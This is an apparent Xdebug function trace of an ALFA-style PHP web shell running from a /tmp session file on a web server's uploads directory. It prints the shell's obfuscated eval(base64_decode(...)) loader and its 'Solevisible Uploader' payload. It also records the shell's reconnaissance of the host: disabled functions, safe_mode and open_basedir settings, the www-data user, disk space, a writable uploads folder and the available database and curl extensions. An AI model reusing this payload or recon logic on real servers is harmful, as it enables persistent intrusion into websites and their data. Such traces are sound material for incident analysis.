7	68	0	0.002905	407072	base64_encode	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	69	1	'$x = base64_decode("PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVh'
7	68	1	0.002932	409664
7	68	R			'JHggPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ1pXTm9ieUFpUEhScGRHeGxQbE52YkdWMmFYTnBZbXhsSUZWd2JHOWhaR1Z5UEM5MGFYUnNaVDVjYmp4aWIyUjVJR0puWTI5c2IzSTlJekF3TURBd01ENWNianhpY2o1Y2JqeGpaVzUwWlhJK1BHWnZiblFnWTI5c2IzSTlYQ0ozYUdsMFpWd2lQanhpUGxsdmRYSWdTWEFnUVdSa2NtVnpjeUJwY3p3dllqNGdQR1p2Ym5RZ1kyOXNiM0k5WENKM2FHbDBaVndpUGp3dlptOXVkRDQ4TDJObGJuUmxjajVjYmp4aWFXYytQR1p2Ym5RZ1kyOXNiM0k5WENJak4wTkdRekF3WENJK1BHTmxiblJsY2o1Y2JpSTdaV05vYnlBa1gxTkZVbFpGVWxzblVrVk5UMVJGWDBGRVJGSW5YVHRsWTJodklDSThMMk5sYm5SbGNqNDhMMlp2Ym5RK1BDOWhQanht'
6	67	1	0.002964	409632
6	67	R			'JHggPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ1pXTm9ieUFpUEhScGRHeGxQbE52YkdWMmFYTnBZbXhsSUZWd2JHOWhaR1Z5UEM5MGFYUnNaVDVjYmp4aWIyUjVJR0puWTI5c2IzSTlJekF3TURBd01ENWNianhpY2o1Y2JqeGpaVzUwWlhJK1BHWnZiblFnWTI5c2IzSTlYQ0ozYUdsMFpWd2lQanhpUGxsdmRYSWdTWEFnUVdSa2NtVnpjeUJwY3p3dllqNGdQR1p2Ym5RZ1kyOXNiM0k5WENKM2FHbDBaVndpUGp3dlptOXVkRDQ4TDJObGJuUmxjajVjYmp4aWFXYytQR1p2Ym5RZ1kyOXNiM0k5WENJak4wTkdRekF3WENJK1BHTmxiblJsY2o1Y2JpSTdaV05vYnlBa1gxTkZVbFpGVWxzblVrVk5UMVJGWDBGRVJGSW5YVHRsWTJodklDSThMMk5sYm5SbGNqNDhMMlp2Ym5RK1BDOWhQanht'
5	66	1	0.002993	409632
5	66	R			'JHggPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ1pXTm9ieUFpUEhScGRHeGxQbE52YkdWMmFYTnBZbXhsSUZWd2JHOWhaR1Z5UEM5MGFYUnNaVDVjYmp4aWIyUjVJR0puWTI5c2IzSTlJekF3TURBd01ENWNianhpY2o1Y2JqeGpaVzUwWlhJK1BHWnZiblFnWTI5c2IzSTlYQ0ozYUdsMFpWd2lQanhpUGxsdmRYSWdTWEFnUVdSa2NtVnpjeUJwY3p3dllqNGdQR1p2Ym5RZ1kyOXNiM0k5WENKM2FHbDBaVndpUGp3dlptOXVkRDQ4TDJObGJuUmxjajVjYmp4aWFXYytQR1p2Ym5RZ1kyOXNiM0k5WENJak4wTkdRekF3WENJK1BHTmxiblJsY2o1Y2JpSTdaV05vYnlBa1gxTkZVbFpGVWxzblVrVk5UMVJGWDBGRVJGSW5YVHRsWTJodklDSThMMk5sYm5SbGNqNDhMMlp2Ym5RK1BDOWhQanht'
5	69	0	0.003022	409632	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	914	2	'ALFA_UPLOADER'	'eval(base64_decode(\'JHggPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBZ1pXTm9ieUFpUEhScGRHeGxQbE52YkdWMmFYTnBZbXhsSUZWd2JHOWhaR1Z5UEM5MGFYUnNaVDVjYmp4aWIyUjVJR0puWTI5c2IzSTlJekF3TURBd01ENWNianhpY2o1Y2JqeGpaVzUwWlhJK1BHWnZiblFnWTI5c2IzSTlYQ0ozYUdsMFpWd2lQanhpUGxsdmRYSWdTWEFnUVdSa2NtVnpjeUJwY3p3dllqNGdQR1p2Ym5RZ1kyOXNiM0k5WENKM2FHbDBaVndpUGp3dlptOXVkRDQ4TDJObGJuUmxjajVjYmp4aWFXYytQR1p2Ym5RZ1kyOXNiM0k5WENJak4wTkdRekF3WENJK1BHTmxiblJsY2o1Y2JpSTdaV05vYnlBa1gxTkZVbFpGVWxzblVrVk5UMVJGWDBGRVJGSW5YVHRsWTJodklDSThMMk5sYm5SbGNqNDh'
5	69	1	0.003049	409736
5	69	R			TRUE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	966	_POST['charset'] = 'Windows-1251'
5	70	0	0.003077	409664	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	967	1	'diskfreespace'
5	70	1	0.003090	409704
5	70	R			TRUE
5	71	0	0.003103	409664	diskfreespace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	967	1	'/var/www/html/uploads/'
5	71	1	0.003121	409696
5	71	R			194105184256
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	967	$freeSpace = 194105184256
5	72	0	0.003148	409664	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	968	1	'disk_total_space'
5	72	1	0.003161	409704
5	72	R			TRUE
5	73	0	0.003174	409664	disk_total_space	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	968	1	'/var/www/html/uploads/'
5	73	1	0.003188	409696
5	73	R			232015802368
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	968	$totalSpace = 232015802368
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	969	$totalSpace = 232015802368
5	74	0	0.003226	409664	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	973	1	'ssh2_connect'
5	74	1	0.003239	409704
5	74	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	976	$ssh2 = '<span class=\'header_off\'> OFF </span>'
5	75	0	0.003266	409664	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	977	1	'curl_version'
5	75	1	0.003279	409704
5	75	R			TRUE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	978	$curl = '<span class=\'header_on\'> ON </span>'
5	76	0	0.003304	409664	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	981	1	'mysql_get_client_info'
5	76	1	0.003321	409704
5	76	R			FALSE
5	77	0	0.003334	409664	class_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	981	1	'mysqli'
5	77	1	0.003347	409704
5	77	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	984	$mysql = '<span class=\'header_off\'> OFF </span>'
5	78	0	0.003372	409664	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	985	1	'mssql_connect'
5	78	1	0.003385	409704
5	78	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	988	$mssql = '<span class=\'header_off\'> OFF </span>'
5	79	0	0.003411	409664	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	989	1	'pg_connect'
5	79	1	0.003424	409704
5	79	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	992	$pg = '<span class=\'header_off\'> OFF </span>'
5	80	0	0.003448	409664	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	993	1	'oci_connect'
5	80	1	0.003461	409704
5	80	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	996	$or = '<span class=\'header_off\'> OFF </span>'
5	81	0	0.003486	409664	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	997	1	'disable_functions'
5	81	1	0.003501	410144
5	81	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
5	82	0	0.003525	409664	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	998	1	'disable_functions'
5	82	1	0.003538	410144
5	82	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
5	83	0	0.003561	409664	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1001	1	'safe_mode'
5	83	1	0.003574	409696
5	83	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1004	$safe_modes = '<span class=\'header_on\'>OFF</span>'
5	84	0	0.003600	409664	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1006	1	'open_basedir'
5	84	1	0.003613	409696
5	84	R			''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1013	$open_b = '<span class=\'header_none\'> NONE </span>'
5	85	0	0.003639	409664	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1014	1	'safe_mode_exec_dir'
5	85	1	0.003652	409696
5	85	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1017	$safe_exe = '<span class=\'header_none\'> NONE </span>'
5	86	0	0.003678	409664	ini_get	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1018	1	'safe_mode_include_dir'
5	86	1	0.003691	409696
5	86	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1021	$safe_include = '<span class=\'header_none\'> NONE </span>'
5	87	0	0.003717	409664	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1022	1	'posix_getegid'
5	87	1	0.003730	409704
5	87	R			TRUE
5	88	0	0.003743	409664	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1029	1	'posix_getpwuid'
5	88	1	0.003755	409704
5	88	R			TRUE
5	89	0	0.003767	409664	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1029	1	'posix_geteuid'
5	89	1	0.003780	409704
5	89	R			TRUE
5	90	0	0.003792	409664	posix_geteuid	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1029	0
5	90	1	0.003805	409664
5	90	R			33
5	91	0	0.003817	409664	posix_getpwuid	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1029	1	33
5	91	1	0.003885	410496
5	91	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1029	$uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
5	92	0	0.003932	410464	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1030	1	'posix_getgrgid'
5	92	1	0.003946	410504
5	92	R			TRUE
5	93	0	0.003959	410464	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1030	1	'posix_getegid'
5	93	1	0.003971	410504
5	93	R			TRUE
5	94	0	0.003988	410464	posix_getegid	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1030	0
5	94	1	0.004001	410464
5	94	R			33
5	95	0	0.004013	410464	posix_getgrgid	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1030	1	33
5	95	1	0.004041	411128
5	95	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1030	$gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1031	$user = 'www-data'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1032	$uid = 33
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1033	$group = 'www-data'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1034	$gid = 33
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1036	$cwd_links = ''
5	96	0	0.004132	409744	explode	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1037	2	'/'	'/var/www/html/uploads/'
5	96	1	0.004147	410352
5	96	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1037	$path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	$i = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1040	$cwd_links .= '<a class=\'header_pwd\' onclick=\'g("FilesMan","'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1041	$cach_cwd_path = ''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	$j = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1046	$cwd_links .= '")\' path=\'/\' href=\'#action=fileman&path=/\'>/</a>'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1040	$cwd_links .= '<a class=\'header_pwd\' onclick=\'g("FilesMan","'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1041	$cach_cwd_path = ''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	$j = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1046	$cwd_links .= '")\' path=\'/var/\' href=\'#action=fileman&path=/var/\'>var/</a>'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1040	$cwd_links .= '<a class=\'header_pwd\' onclick=\'g("FilesMan","'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1041	$cach_cwd_path = ''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	$j = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1046	$cwd_links .= '")\' path=\'/var/www/\' href=\'#action=fileman&path=/var/www/\'>www/</a>'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1040	$cwd_links .= '<a class=\'header_pwd\' onclick=\'g("FilesMan","'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1041	$cach_cwd_path = ''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	$j = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'html/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'html/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1046	$cwd_links .= '")\' path=\'/var/www/html/\' href=\'#action=fileman&path=/var/www/html/\'>html/</a>'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1040	$cwd_links .= '<a class=\'header_pwd\' onclick=\'g("FilesMan","'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1041	$cach_cwd_path = ''
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	$j = 0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= '/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'var/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'www/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'html/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'html/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1043	$cwd_links .= 'uploads/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1044	$cach_cwd_path .= 'uploads/'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1042	++$j
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1046	$cwd_links .= '")\' path=\'/var/www/html/uploads/\' href=\'#action=fileman&path=/var/www/html/uploads/\'>uploads/</a>'
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1039	++$i
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1048	$drives = ''
5	97	0	0.004930	411096	range	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1049	2	'a'	'z'
5	97	1	0.004944	412496
5	97	R			[0 => 'a', 1 => 'b', 2 => 'c', 3 => 'd', 4 => 'e', 5 => 'f', 6 => 'g', 7 => 'h', 8 => 'i', 9 => 'j', 10 => 'k', 11 => 'l', 12 => 'm', 13 => 'n', 14 => 'o', 15 => 'p', 16 => 'q', 17 => 'r', 18 => 's', 19 => 't', 20 => 'u', 21 => 'v', 22 => 'w', 23 => 'x', 24 => 'y', 25 => 'z']
5	98	0	0.004977	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'a:\\'
5	98	1	0.004996	412504
5	98	R			FALSE
5	99	0	0.005010	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'b:\\'
5	99	1	0.005027	412504
5	99	R			FALSE
5	100	0	0.005040	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'c:\\'
5	100	1	0.005055	412504
5	100	R			FALSE
5	101	0	0.005069	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'd:\\'
5	101	1	0.005087	412504
5	101	R			FALSE
5	102	0	0.005100	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'e:\\'
5	102	1	0.005114	412504
5	102	R			FALSE
5	103	0	0.005127	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'f:\\'
5	103	1	0.005141	412504
5	103	R			FALSE
5	104	0	0.005154	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'g:\\'
5	104	1	0.005168	412504
5	104	R			FALSE
5	105	0	0.005180	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'h:\\'
5	105	1	0.005195	412504
5	105	R			FALSE
5	106	0	0.005207	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'i:\\'
5	106	1	0.005221	412504
5	106	R			FALSE
5	107	0	0.005233	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'j:\\'
5	107	1	0.005247	412504
5	107	R			FALSE
5	108	0	0.005260	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'k:\\'
5	108	1	0.005274	412504
5	108	R			FALSE
5	109	0	0.005286	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'l:\\'
5	109	1	0.005300	412504
5	109	R			FALSE
5	110	0	0.005313	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'm:\\'
5	110	1	0.005327	412504
5	110	R			FALSE
5	111	0	0.005340	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'n:\\'
5	111	1	0.005354	412504
5	111	R			FALSE
5	112	0	0.005367	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'o:\\'
5	112	1	0.005381	412504
5	112	R			FALSE
5	113	0	0.005394	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'p:\\'
5	113	1	0.005408	412504
5	113	R			FALSE
5	114	0	0.005421	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'q:\\'
5	114	1	0.005436	412504
5	114	R			FALSE
5	115	0	0.005449	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'r:\\'
5	115	1	0.005462	412504
5	115	R			FALSE
5	116	0	0.005475	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	's:\\'
5	116	1	0.005489	412504
5	116	R			FALSE
5	117	0	0.005501	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	't:\\'
5	117	1	0.005515	412504
5	117	R			FALSE
5	118	0	0.005528	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'u:\\'
5	118	1	0.005542	412504
5	118	R			FALSE
5	119	0	0.005555	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'v:\\'
5	119	1	0.005569	412504
5	119	R			FALSE
5	120	0	0.005581	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'w:\\'
5	120	1	0.005596	412504
5	120	R			FALSE
5	121	0	0.005608	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'x:\\'
5	121	1	0.005622	412504
5	121	R			FALSE
5	122	0	0.005635	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'y:\\'
5	122	1	0.005649	412504
5	122	R			FALSE
5	123	0	0.005661	412464	is_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1050	1	'z:\\'
5	123	1	0.005675	412504
5	123	R			FALSE
5	124	0	0.005689	411096	__showicon	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1058	1	'alfamini'
5	124	1	0.005703	411096
5	124	R			'http://solevisible.com/images/alfamini.png'
5	125	0	0.006040	423496	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1069	1	'header_values'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
5	125	1	0.006074	423496
5	125	R			'#67ABDF'
5	126	0	0.006089	427592	__showicon	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1069	1	'alfamini'
5	126	1	0.006103	427592
5	126	R			'http://solevisible.com/images/alfamini.png'
5	127	0	0.006120	431688	__showicon	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1069	1	'alfamini'
5	127	1	0.006134	431688
5	127	R			'http://solevisible.com/images/alfamini.png'
5	128	0	0.006149	431688	__showicon	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1069	1	'btn'
5	128	1	0.006167	431688
5	128	R			'http://solevisible.com/images/btn.png'
5	129	0	0.006183	431688	is_writable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1070	1	'/var/www/html/uploads/'
5	129	1	0.006204	431728
5	129	R			TRUE
5	130	0	0.006220	435784	alfaCssLoadColors	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1070	0
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	627	$css = ''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'shell_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.header'
6	131	0	0.006267	435784	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'shell_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.header' => 'border: 7px solid {color}', '#meunlist' => 'border-color: {color}', '#hidden_sh' => 'background-color: {color}', '.ajaxarea' => 'border: 1px solid {color}', '.foot' => 'border-color: {color}']]
6	131	1	0.006304	435784
6	131	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	132	0	0.006330	435784	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border: 7px solid {color}'
6	132	1	0.006348	435936
6	132	R			'border: 7px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 7px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.header{border: 7px solid #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '#meunlist'
